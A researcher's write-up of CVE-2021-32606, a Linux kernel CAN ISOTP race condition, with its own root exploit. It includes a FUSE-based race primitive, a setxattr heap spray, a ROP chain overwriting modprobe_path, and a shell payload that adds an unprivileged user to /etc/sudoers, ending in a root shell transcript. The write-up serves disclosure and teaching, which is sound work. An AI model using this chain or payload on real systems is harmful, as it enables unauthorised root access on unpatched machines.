CVE-2021-32606: CAN ISOTP local privilege escalation

This article covers CVE-2021-32606, a recent vulnerability in the Linux kernel. The vulnerable code is the ISOTP protocol implementation in the CAN networking subsystem. Below, I describe the vulnerability and the exploitation approach that led to a successful local privilege escalation to root.

Vulnerability

The vulnerability is a race condition between isotp_setsockopt() and isotp_bind() that makes it possible to modify socket options after the socket has been bound. In the CAN ISOTP protocol, non-default socket options have to be set with isotp_setsockopt() before the socket is bound. Especially since the introduction of CAN_ISOTP_SF_BROADCAST support in commit 921ca574cd38, socket options must not change after binding, as this might result in socket behavior other than previously expected.

Every ISOTP socket has the following struct can_isotp_options which can be changed with isotp_setsockopt().

struct can_isotp_options {
        __u32 flags;            /* set flags for isotp behaviour.       */
	...

When an ISOTP socket is about to be bound in isotp_bind(), the flags are checked against CAN_ISOTP_SF_BROADCAST. If CAN_ISOTP_SF_BROADCAST is set, no CAN receiver is registered. A CAN receiver is a callback that runs automatically as a software interrupt in order to receive incoming CAN messages.

static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
	...
	/* do not register frame reception for functional addressing */
	if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
		do_rx_reg = 0;
	...
	if (do_rx_reg)
		can_rx_register(net, dev, addr->can_addr.tp.rx_id,
				SINGLE_MASK(addr->can_addr.tp.rx_id),
				isotp_rcv, sk, "isotp", sk);
	...
	so->bound = 1;
	...

In isotp_bind() above, we can see that can_rx_register() won't be called if CAN_ISOTP_SF_BROADCAST is set. In isotp_setsockopt(), we can either set or remove this flag.

The following excerpt shows isotp_setsockopt() from net/can/isotp.c

static int isotp_setsockopt(struct socket *sock, int level, int optname,
			    sockptr_t optval, unsigned int optlen)
{
	struct sock *sk = sock->sk;
	struct isotp_sock *so = isotp_sk(sk);
	int ret = 0;

	if (level != SOL_CAN_ISOTP)
		return -EINVAL;

	if (so->bound)							[1]
		return -EISCONN;

	switch (optname) {
	case CAN_ISOTP_OPTS:
		if (optlen != sizeof(struct can_isotp_options))
			return -EINVAL;

		if (copy_from_sockptr(&so->opt, optval, optlen))	[2]
			return -EFAULT;
		break;
	...

If the socket is already bound [1], the function returns early, as the socket options of a bound socket must not be modified. If the socket is not bound, struct can_isotp_options is copied [2] from user space.

Now consider the following race condition between isotp_setsockopt() and isotp_bind():

1. isotp_setsockopt() is called and we pass the check at [1] since the socket is unbound.
2. isotp_bind() is by default called without CAN_ISOTP_SF_BROADCAST, resulting in the registration of a CAN receiver. In the end, so->bound will be set to 1.
3. The socket was just bound but we are still in isotp_setsockopt(). If the timing is right, we will change struct can_isotp_options with flags set to CAN_ISOTP_SF_BROADCAST. Notice that the copy [2] will happen on an already bound socket.

At this point, we have a socket with a registered CAN receiver, even though its newly set CAN_ISOTP_SF_BROADCAST flag says that none should have been registered.

After winning the race, we close the socket and isotp_release() is called.

static int isotp_release(struct socket *sock)
{
	...

	/* remove current filters & unregister */
	if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) {		[1]
		if (so->ifindex) {
			struct net_device *dev;

			dev = dev_get_by_index(net, so->ifindex);
			if (dev) {
				can_rx_unregister(net, dev, so->rxid,		[2]
						  SINGLE_MASK(so->rxid),
						  isotp_rcv, sk);
				dev_put(dev);
			}
		}
	}

	...

The check at [1] ensures that the CAN receiver is unregistered only if CAN_ISOTP_SF_BROADCAST is not set in flags. Because we illegally changed flags after binding the socket, the kernel now assumes that no CAN receiver was registered, so none is unregistered.

At this point, the ISOTP socket is closed, but its CAN receiver is still registered. If another socket sends a message to the previously freed socket, a softirq calls isotp_rcv() on the freed struct isotp_sock, resulting in a use-after-free.
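The effect of the release condition can be checked in isolation with a small userspace model. This is only a sketch: receiver_left_after_release() is a hypothetical helper, and MODEL_SF_BROADCAST is assumed to mirror the value of CAN_ISOTP_SF_BROADCAST.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: mirrors CAN_ISOTP_SF_BROADCAST from linux/can/isotp.h. */
#define MODEL_SF_BROADCAST 0x800u

/*
 * Model of the condition at [1] in isotp_release().
 * Returns true if a CAN receiver is still registered after release.
 */
bool receiver_left_after_release(uint32_t flags, bool bound, bool rx_registered)
{
	/* same test as the kernel: unregister only if bound and not broadcast */
	if (bound && !(flags & MODEL_SF_BROADCAST))
		rx_registered = false; /* stands in for can_rx_unregister() */

	return rx_registered;
}
```

A normally bound socket (flags 0, receiver registered) leaves nothing behind, and a legitimate broadcast socket never had a receiver. Only the raced combination, bound with a registered receiver and the broadcast flag set, leaves the receiver dangling.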

Exploitation

In order to allow successful exploitation, the following conditions are required:

The kernel needs to be built with the config option CONFIG_USER_NS enabled. This option is needed to set up a sandbox for the unprivileged user in which the VCAN and ISOTP modules can be autoloaded. The former is needed to set up a CAN networking device for our ISOTP sockets, and the latter is needed to create those sockets.
An infoleak is needed in order to bypass KASLR and to get the base address held in the GS register. The use of the latter will be explained soon. In my case, I could trigger a kernel warning which prints an Oops-style message to the kernel log. The kernel log can be read on distributions which haven't restricted access to dmesg via CONFIG_SECURITY_DMESG_RESTRICT.
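Whether the kernel log is readable can be checked at runtime. CONFIG_SECURITY_DMESG_RESTRICT only sets the default of the kernel.dmesg_restrict sysctl, so a minimal sketch can read that value from procfs. The helper name read_dmesg_restrict() is made up for this illustration.

```c
#include <stdio.h>

/*
 * Read an integer sysctl value from the given procfs path.
 * Returns the value, or -1 if the file cannot be opened or parsed.
 */
int read_dmesg_restrict(const char *path)
{
	FILE *f = fopen(path, "r");
	int value = -1;

	if (!f)
		return -1;

	if (fscanf(f, "%d", &value) != 1)
		value = -1;

	fclose(f);
	return value;
}
```

Called with "/proc/sys/kernel/dmesg_restrict", a result of 0 means unprivileged users can read the kernel log, while 1 means access is restricted.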

Exploitation is possible on machines with SMEP, SMAP, KASLR and KPTI enabled.

FUSE technique

For this particular exploit, I originally wanted to use the userfault technique to reliably control the race condition. Because userfault has recently been disabled, I looked for other possibilities and came across a technique that Jann Horn used in the past to control a race condition. Since userfault used to work well, this technique has probably not been used as often, but it is still a worthwhile approach to make this particular exploit reliable.

One drawback of the FUSE technique is that FUSE might not come preinstalled on some distributions. On openSUSE Tumbleweed with the XFCE desktop, FUSE came preinstalled and was accessible to unprivileged users. Repeated tests have shown that there is still a good chance of exploiting this vulnerability without FUSE or userfault, but the reliability would likely be lower.

In short, FUSE stands for Filesystem in Userspace and allows mounting self-made filesystems in a user-controlled directory. For this exploit, I used a template filesystem from libfuse called `hello`, which I modified for use in this exploit.

The following excerpt shows the hello_read() function from the hello filesystem

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
                struct fuse_file_info *fi)
{
        /* wait inside isotp_setsockopt() */
        sleep(2);						

        int flags = CAN_ISOTP_SF_BROADCAST;
        struct can_isotp_options opts;
        size_t len = sizeof(opts);

        memset(&opts, 0, sizeof(opts));
        opts.flags = flags;

        if (offset < len) {
                if (offset + size > len)
                        size = len - offset;
                /* cast to char * so that offset is applied in bytes */
                memcpy(buf, (char *)&opts + offset, size);
        } else {
                size = 0;
        }

        return size;
}
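The offset handling in a read handler of this kind is byte-based: offset and size describe a byte window into the object being served. A minimal standalone sketch of that clamping logic, using a hypothetical helper copy_slice() that is not part of libfuse, could look like this:

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy up to `size` bytes of the object at `src` (src_len bytes long),
 * starting at byte `offset`, into `dst`.
 * Returns the number of bytes actually copied (0 if offset is past the end).
 */
size_t copy_slice(char *dst, const void *src, size_t src_len,
		  size_t offset, size_t size)
{
	if (offset >= src_len)
		return 0;

	/* clamp the request to the bytes that remain after offset */
	if (size > src_len - offset)
		size = src_len - offset;

	/* byte-wise pointer arithmetic: cast before adding the offset */
	memcpy(dst, (const char *)src + offset, size);
	return size;
}
```

The cast matters: adding an offset to a pointer of struct type advances by whole structs, not by bytes.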

In this case, any read associated with the hello filesystem will be redirected to hello_read(). Inside hello_read(), we sleep() for 2 seconds, effectively halting the kernel execution at copy_from_sockptr() in isotp_setsockopt().

	if (copy_from_sockptr(&so->opt, optval, optlen))
		return -EFAULT;

Meanwhile, isotp_bind() finishes and binds the socket, finally setting so->bound to 1. Only then does the copy proceed, bringing the flags containing CAN_ISOTP_SF_BROADCAST into kernel space.

void setup_fusefs(void)
{
        fuse_fd = open("mnt/hello", O_RDWR);				       	   [1]
        if (fuse_fd < 0)
                die("failed to open fuse fd");

        fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
				PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0);   [2]

        if (fuse_map == MAP_FAILED)
                die("failed to map with fuse fs");
}

In my exploit, I obtain a file descriptor for the file on the FUSE filesystem [1] and mmap memory [2], similarly to userfault. This mapping is backed by the previously opened fuse_fd. As already mentioned, any kernel copy from this mmap'ed memory will be served by hello_read().

At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race condition between isotp_setsockopt() and isotp_bind().

What does the controlled race condition scenario look like?

1. isotp_setsockopt() is called on an unbound socket.
   - copy_from_sockptr() wants to copy struct can_isotp_options from user space
   - hello_read() is called and goes to sleep() for 2 seconds; kernel execution is now halted!
2. While we are still inside setsockopt(), we call isotp_bind().
   - the CAN_ISOTP_SF_BROADCAST flag is not set, so a CAN receiver is registered
   - isotp_bind() returns, the socket is now successfully bound
3. During the 2 seconds isotp_setsockopt() was halted, we expect isotp_bind() to have completed.
   - memcpy() inside hello_read() now provides the struct that is copied to kernel space
   - we set the CAN_ISOTP_SF_BROADCAST flag on a bound socket!
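The scenario can be replayed deterministically in userspace by modelling the blocked copy as a hook that runs between the bound check and the copy. This is a simplified sketch, not kernel code: struct model_sock, model_bind() and model_setsockopt() are hypothetical stand-ins, and MODEL_SF_BROADCAST is assumed to mirror CAN_ISOTP_SF_BROADCAST.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: mirrors CAN_ISOTP_SF_BROADCAST from linux/can/isotp.h. */
#define MODEL_SF_BROADCAST 0x800u

struct model_sock {
	uint32_t flags;     /* stands in for so->opt.flags */
	bool bound;         /* stands in for so->bound */
	bool rx_registered; /* true once a CAN receiver is registered */
};

/* Code that runs while the copy from user memory is blocked. */
typedef void (*fault_hook)(struct model_sock *so);

/* Model of isotp_bind(): register a receiver unless broadcast is set. */
void model_bind(struct model_sock *so)
{
	if (!(so->flags & MODEL_SF_BROADCAST))
		so->rx_registered = true;
	so->bound = true;
}

/*
 * Model of isotp_setsockopt(): check, then copy.
 * `while_blocked` plays the role of the sleeping FUSE read handler.
 * Returns 0 on success, -1 if the socket is already bound.
 */
int model_setsockopt(struct model_sock *so, uint32_t user_flags,
		     fault_hook while_blocked)
{
	if (so->bound)
		return -1;

	if (while_blocked)
		while_blocked(so); /* bind() completes inside this window */

	so->flags = user_flags; /* the copy lands on a bound socket */
	return 0;
}
```

Passing model_bind as the hook reproduces the inconsistent state: the socket is bound, a receiver is registered, and the broadcast flag is set. Passing NULL and calling model_bind() afterwards gives the intended behavior, where no receiver is registered.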

Further exploitation

As already mentioned, closing the socket won't unregister the CAN receiver, so we trigger several use-after-frees inside isotp_rcv() whenever we send a message to the freed socket.

My approach focuses on spraying the freed struct isotp_sock so we can reliably pass the checks in isotp_rcv() and call an overwritten function pointer. Because the struct is pretty big (on my machine it was 17432 bytes) and exceeds the biggest kmalloc cache kmalloc-8k, it won't be allocated in any of the generic SLAB caches. Instead, the page allocator will allocate it.
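To get a feeling for the size of the block the page allocator hands out, the allocation order can be computed by hand. The sketch below assumes 4 KiB pages and power-of-two page blocks. page_order_for() is a hypothetical helper written for this illustration, not a kernel function.

```c
#include <stddef.h>

/*
 * Smallest order such that (1 << order) pages of page_size bytes
 * can hold an object of `size` bytes.
 */
unsigned int page_order_for(size_t size, size_t page_size)
{
	size_t pages = (size + page_size - 1) / page_size; /* round up */
	unsigned int order = 0;

	while (((size_t)1 << order) < pages)
		order++;

	return order;
}
```

For the 17432 bytes measured on my machine, this gives 5 pages rounded up to an order-3 block, i.e. 8 pages or 32768 bytes. Under the same assumptions, a spray buffer of the same size falls into the same order.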

Looking for a feasible spray primitive, I ended up choosing setxattr(). This syscall has mainly been used in combination with userfault, as setxattr() frees the buffer right after copying it. In fact, we could probably hold the buffer with FUSE, but after repeated tests I noticed that setxattr() alone is also very reliable in this case. The most important property for this approach is that setxattr() does not erase the buffer before freeing it, so the previously copied bytes remain in memory.

Theoretically, some other object could be allocated right after we sprayed the freed socket, but in practice it does not provoke any crashes and in the worst case we can simply rerun the exploit and try again. In the following, I will explain this further.

static void isotp_rcv(struct sk_buff *skb, void *data)
{
	/* Strictly receive only frames with the configured MTU size
	 * => clear separation of CAN2.0 / CAN FD transport channels
	 */
	if (skb->len != so->ll.mtu)							[1]
		return;
	...
	switch (n_pci_type) {
	...
	case N_PCI_SF:
		/* rx path: single frame
		 *
		 * As we do not have a rx.ll_dl configuration, we can only test
		 * if the CAN frames payload length matches the LL_DL == 8
		 * requirements - no matter if it's CAN 2.0 or CAN FD
		 */

		/* get the SF_DL from the N_PCI byte */
		sf_dl = cf->data[ae] & 0x0F;

		if (cf->len <= CAN_MAX_DLEN) {
			isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl);		[2]
	...

At the beginning of isotp_rcv(), the length of the received sk_buff is checked against so->ll.mtu [1]. The skb->len of the received message is 16 by default, so so->ll.mtu also has to be 16. If this is not the case, we return from the function. Because we control the whole struct isotp_sock with the setxattr() spray, we can set so->ll.mtu to 16. This is also why this seemingly unreliable spraying approach is still very reliable: if the spray fails, it is very unlikely that isotp_rcv() reads exactly 16 at the position of so->ll.mtu. For any garbage value other than 16, we safely return from isotp_rcv() and can try again.

After the initial check [1], isotp_rcv_sf() will be called [2] to receive a so-called CAN single frame message in case the message length is <= 8.

static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
			struct sk_buff *skb, int len)
{
	...
	hrtimer_cancel(&so->rxtimer);							[1]
	so->rx.state = ISOTP_IDLE;
	...
	if ((so->opt.flags & ISOTP_CHECK_PADDING) &&					[2]
	    check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
		/* malformed PDU - report 'not a data message' */
		sk->sk_err = EBADMSG;
		if (!sock_flag(sk, SOCK_DEAD))
			sk->sk_error_report(sk);					[3]
		return 1;
	}

At [1], one of the hrtimers is cancelled by calling hrtimer_cancel(). I won't cover hrtimers in detail in this article. All you have to know is that we need to overwrite the freed socket's memory at so->rxtimer.base with a valid pointer in order to prevent kernel crashes. struct hrtimer holds a pointer to a struct hrtimer_clock_base, which is defined per CPU core. Fortunately, the aforementioned GS register holds the base address of a core's per-CPU data, and adding a constant offset to this address gives us a valid struct hrtimer_clock_base.

After a couple of checks in hrtimer_cancel(), the socket's flags are checked [2] against ISOTP_CHECK_PADDING. This is the same flags field in which CAN_ISOTP_SF_BROADCAST is stored. We can provide this flag along with some other flags needed in check_pad(). The combination of the user-controlled message length and the padding flags results in the message being seen as malformed. Accordingly, the socket calls sk_error_report() [3] to report this issue. Since we control every single byte of struct isotp_sock, we can also overwrite the sk_error_report() pointer. At this point, we control the kernel's instruction pointer.
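The exploit output further below prints "flags = 838". Assuming this value is hexadecimal, it can be decoded into the individual ISOTP flags. The following sketch uses flag values as I understand them from linux/can/isotp.h. Treat them as assumptions and check them against your own headers. print_isotp_flags() is a hypothetical helper.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct flag_name {
	uint32_t bit;
	const char *name;
};

/* Assumed values from linux/can/isotp.h; only the bits used here. */
static const struct flag_name known_flags[] = {
	{ 0x008u, "CAN_ISOTP_RX_PADDING" },
	{ 0x010u, "CAN_ISOTP_CHK_PAD_LEN" },
	{ 0x020u, "CAN_ISOTP_CHK_PAD_DATA" },
	{ 0x800u, "CAN_ISOTP_SF_BROADCAST" },
};

/* Print the name of every known bit set in flags; return the bits left over. */
uint32_t print_isotp_flags(uint32_t flags)
{
	size_t i;

	for (i = 0; i < sizeof(known_flags) / sizeof(known_flags[0]); i++) {
		if (flags & known_flags[i].bit) {
			printf("%s\n", known_flags[i].name);
			flags &= ~known_flags[i].bit;
		}
	}
	return flags;
}
```

Under these assumptions, print_isotp_flags(0x838) names all four flags and returns 0, which matches the description above: the broadcast flag plus the padding flags needed to reach sk_error_report().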

One may ask where we are supposed to redirect execution to. Jumping to invalid places led to a kernel panic, but then I noticed that the RDI register held the address of our freed struct isotp_sock. I decided to perform a stack pivot to this address and start executing ROP gadgets. In order to make use of the ROP gadgets found in the vmlinux image, I use the KASLR offset leaked by the warning in the kernel log. When I assembled the ROP chain, I took into account that the space might not be sufficient and that some important data might eventually be overwritten. Because of that, I almost immediately moved the stack pointer to somewhere in the middle of the sprayed target, where no data is used by isotp_rcv(). This is possible because struct isotp_sock is large enough to hold the payload inside the object. In this example, I place my extended ROP chain at offset 0x718.

	/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
	dst = (uint64_t *)(p + 0x2b8);
	*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;

	/* ROP at isotp_sock + 0x8 */
	dst = (uint64_t *)(p + 0x8);
	*dst = ROP_RET_0x700 + kaslr_offset;
	dst++;
	/* jump to extended rop chain at isotp_sock + 0x10 */
	*dst = ROP_RET + kaslr_offset;

	/* extended rop chain */
	rop = (uint64_t *)(p + 0x718);
	*rop++ = ROP_POP_RAX__RET + kaslr_offset;
	*rop++ = 0x782f706d742f; /* /tmp/x */
	*rop++ = ROP_POP_RCX__RET + kaslr_offset;
	*rop++ = MODPROBE_PATH + kaslr_offset;
	*rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
	*rop++ = ROP_POP_RAX__RET + kaslr_offset;
	*rop++ = DO_TASK_DEAD + kaslr_offset;			[1]
	*rop++ = ROP_JMP_RAX + kaslr_offset;
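The offset 0x718 follows from how the stack pointer moves through the first gadgets. On x86-64, a plain ret pops 8 bytes, and ret imm16 pops 8 bytes and then adds the immediate to RSP. The sketch below replays this arithmetic. It assumes that the final ret of the pivot gadget pops the slot at offset 0x8, as the comment "ROP at isotp_sock + 0x8" suggests, and the helper names are made up for this illustration.

```c
#include <stdint.h>

/* RSP after a plain `ret`: the 8-byte return address is popped. */
uint64_t rsp_after_ret(uint64_t rsp)
{
	return rsp + 8;
}

/* RSP after `ret imm16`: pop the return address, then skip imm bytes. */
uint64_t rsp_after_ret_imm(uint64_t rsp, uint16_t imm)
{
	return rsp + 8 + imm;
}

/*
 * Offset (relative to the object) of the slot consumed by the gadget
 * that runs after `ret imm16`.
 */
uint64_t first_extended_slot(uint64_t first_gadget_slot, uint16_t ret_imm)
{
	uint64_t rsp = first_gadget_slot;

	/* the pivot's ret pops the `ret imm16` gadget stored in this slot */
	rsp = rsp_after_ret(rsp);
	/* `ret imm16` pops the next slot (the plain ret gadget) and skips ahead */
	rsp = rsp_after_ret_imm(rsp, ret_imm);

	return rsp; /* the plain ret gadget pops its target from here */
}
```

With the first gadget at 0x8 and an immediate of 0x700, the result is 0x8 + 8 + 8 + 0x700 = 0x718, which is where the extended chain is placed.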

The following image shows the sprayed target to overwrite struct isotp_sock

The ROP chain consists of a technique to overwrite modprobe_path. In case any user wants to execute a file with an invalid file signature, the program at modprobe_path will be executed with root privileges. This technique was apparently used in some CTF challenges and it was thoroughly described by lkmidas in his blog. In case you want to learn about it in depth, check out his well-written article. Once we have overwritten modprobe_path, the kernel thread will be stopped in do_task_dead() [1]. This step is needed as we are already done with exploiting the kernel, and any further execution of our hijacked kernel thread might result in severe kernel crashes.
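The constant 0x782f706d742f in the chain is simply the string "/tmp/x" packed into one little-endian 64-bit value, so that a single 8-byte store writes the path together with its terminating zero bytes. A short sketch with a hypothetical helper pack_path_le() shows the encoding:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Pack a string of at most 7 characters into a little-endian 64-bit
 * value; the unused high bytes stay zero and act as the terminator.
 * Returns 0 if the string does not fit.
 */
uint64_t pack_path_le(const char *s)
{
	uint64_t v = 0;
	size_t n = strlen(s);
	size_t i;

	if (n > 7)
		return 0;

	for (i = 0; i < n; i++)
		v |= (uint64_t)(unsigned char)s[i] << (8 * i);

	return v;
}
```

pack_path_le("/tmp/x") yields 0x782f706d742f: the first character '/' (0x2f) ends up in the lowest byte and 'x' (0x78) in the sixth.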

ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy; "		[1]
	     "chmod +x /tmp/dummy");
if (ret != 0)
	die("/tmp/dummy creation failed");

ret = system("echo '#!/bin/sh' > /tmp/x; "
	     "echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers' "	[2]
	     ">> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
	die("/tmp/x creation failed");

In short, I create a file /tmp/dummy [1] with the invalid signature 0xff 0xff 0xff 0xff. I also create a file /tmp/x [2], which is the path that the overwritten modprobe_path points to. This small shell script adds the unprivileged user to /etc/sudoers, which allows the user to escalate privileges to root.

Combining everything together

At this point, I have covered all of the individual steps, which now have to be combined. The following sequence is used in my exploit:

1. trigger warning to retrieve kernel addresses from kernel logs
2. set up FUSE filesystem and allocate memory with mmap()
3. set up user namespace to autoload VCAN and ISOTP modules
4. set up CAN networking device with VCAN
5. open ISOTP socket 1
   - this socket will be exploited with the race condition
6. open ISOTP socket 2
   - this socket will only be used to send a CAN message to socket 1
7. win race condition on socket 1
8. close socket 1
9. spray the page allocator with setxattr() containing our payload to overwrite socket 1
10. send CAN message from socket 2 to socket 1
11. isotp_rcv() is run as software interrupt for socket 1
12. in isotp_rcv(), pass checks and call malicious sk_error_report() pointer to perform the stack pivot
13. stack pivot leads to ROP chain execution at struct isotp_sock
14. execute extended ROP chain, overwrite modprobe_path
15. try executing /tmp/dummy, /tmp/x will be executed with root privileges
16. the unprivileged user is now added to /etc/sudoers and we can now get a root shell

Exploit output

noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)

Notice

Researching and exploiting the vulnerability was a great opportunity to expand my knowledge about the Linux kernel. I hope you enjoyed the article. In case of further questions feel free to reach out to me by writing me an e-mail (nslusarek@gmx.net).

Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are interested, please reach out to me via e-mail.

References

https://bugs.chromium.org/p/project-zero/issues/detail?id=808

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

https://www.openwall.com/lists/oss-security/2021/05/11/16
